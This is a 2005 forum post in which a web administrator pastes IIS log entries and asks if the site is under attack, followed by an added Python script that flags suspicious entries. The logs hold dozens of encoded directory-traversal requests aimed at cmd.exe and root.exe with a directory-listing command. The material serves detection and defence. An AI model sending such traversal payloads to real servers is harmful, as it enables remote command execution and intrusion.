December 5th, 2005, 07:13 AM
#1
Junior Member
IIS Log - Is somebody trying to Hack my website
Hi,
I am Sys Admin for a web site. I was going through the IIS logs and found the following entries in the log files:
2005-11-28 01:27:45 80.117.251.32 - 10.100.1.125 80 HEAD /index.html - 200 -
2005-11-28 01:27:49 80.117.251.32 - 10.100.1.125 80 HEAD /MSADC/root.exe /c+dir+c:\ 403 -
2005-11-28 01:27:49 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:27:51 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:27:56 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:00 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:00 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:03 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:04 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:09 80.117.251.32 - 10.100.1.125 80 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:09 80.117.251.32 - 10.100.1.125 80 HEAD /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:28:12 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:28:14 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:28:14 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:28:26 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:28:27 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:28:29 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:29:13 80.117.251.32 - 10.100.1.125 80 HEAD /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:29:38 80.117.251.32 - 10.100.1.125 80 HEAD /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:29:55 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:29:57 80.117.251.32 - 10.100.1.125 80 HEAD /c/winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:29:59 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:30:19 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:30:44 80.117.251.32 - 10.100.1.125 80 HEAD /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:30:46 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:31:08 80.117.251.32 - 10.100.1.125 80 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:31:08 80.117.251.32 - 10.100.1.125 80 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:31:35 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:31:45 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:31:56 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:32:15 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:32:18 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:32:59 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:33:43 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..Á%pc../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:33:44 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:34:09 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:34:11 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:34:42 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..ø€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2005-11-28 01:34:47 80.117.251.32 - 10.100.1.125 80 HEAD /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:34:48 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:35:10 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:35:12 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:35:16 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:35:41 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:35:43 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:12 203.201.214.129 - 10.100.1.125 443 GET /index.html - 200 IPCHECK+4+www.paessler.com
2005-11-28 01:36:28 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:30 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:36:31 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..Á..Á..Á..Áwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:35 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:36:36 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..À%9v../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:47 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:36:48 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..À%qf../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:49 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..Á../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:59 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..Á%8s../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:37:24 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..o../winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:37:26 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:38:30 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/..ü€€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:38:52 80.117.251.32 - 10.100.1.125 80 HEAD /msadc/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 -
I think somebody is trying to hack into the system. Need help.
Regards,
Vishwas
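
A triage sketch for log entries like the ones in the post above, added here as an example and not part of the original post: it groups traversal and cmd.exe/root.exe requests by client IP and lists any that were answered with a 2xx status. The field order is inferred from the posted lines (an assumption, since no #Fields header is shown), and the names `classify` and `triage` are hypothetical.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Field order inferred from the log lines in the post (assumption: no #Fields header is shown).
FIELDS = "date time c_ip user s_ip port method stem query status agent".split()
TRAVERSAL = re.compile(r"\.\.[/\\]|[/\\]\.\.")   # ".." next to a path separator
TARGET = re.compile(r"(?:cmd|root)\.exe$", re.I)  # executables requested in the post

# Lines copied from the post above.
SAMPLE = r"""
2005-11-28 01:27:45 80.117.251.32 - 10.100.1.125 80 HEAD /index.html - 200 -
2005-11-28 01:27:49 80.117.251.32 - 10.100.1.125 80 HEAD /MSADC/root.exe /c+dir+c:\ 403 -
2005-11-28 01:27:49 80.117.251.32 - 10.100.1.125 80 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 -
2005-11-28 01:35:10 80.117.251.32 - 10.100.1.125 80 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 500 -
2005-11-28 01:36:12 203.201.214.129 - 10.100.1.125 443 GET /index.html - 200 IPCHECK+4+www.paessler.com
2005-11-28 01:36:30 80.117.251.32 - 10.100.1.125 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
"""

def classify(stem, rounds=3):
    """Return the reasons a URI stem looks like a traversal or command probe."""
    for _ in range(rounds):                       # decode repeatedly: %5c, %2f, %2e
        decoded = unquote(stem, encoding="latin-1")
        if decoded == stem:
            break
        stem = decoded
    reasons = []
    if TRAVERSAL.search(stem):
        reasons.append("traversal")
    if TARGET.search(stem):
        reasons.append("exe-target")
    return reasons

def triage(text):
    """Per client IP: probe count, status codes returned, probes answered with 2xx."""
    report = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != len(FIELDS):
            continue                              # blank, wrapped or differently formatted line
        rec = dict(zip(FIELDS, parts))
        if not classify(rec["stem"]):
            continue
        entry = report.setdefault(rec["c_ip"], {"probes": 0, "statuses": Counter(), "served": []})
        entry["probes"] += 1
        entry["statuses"][rec["status"]] += 1
        if rec["status"].startswith("2"):
            entry["served"].append(rec["stem"])
    return report
```

For these sample lines `triage(SAMPLE)` reports four probes from 80.117.251.32, all answered 403, 404 or 500, and an empty `served` list; a non-empty `served` list is the entry to examine first.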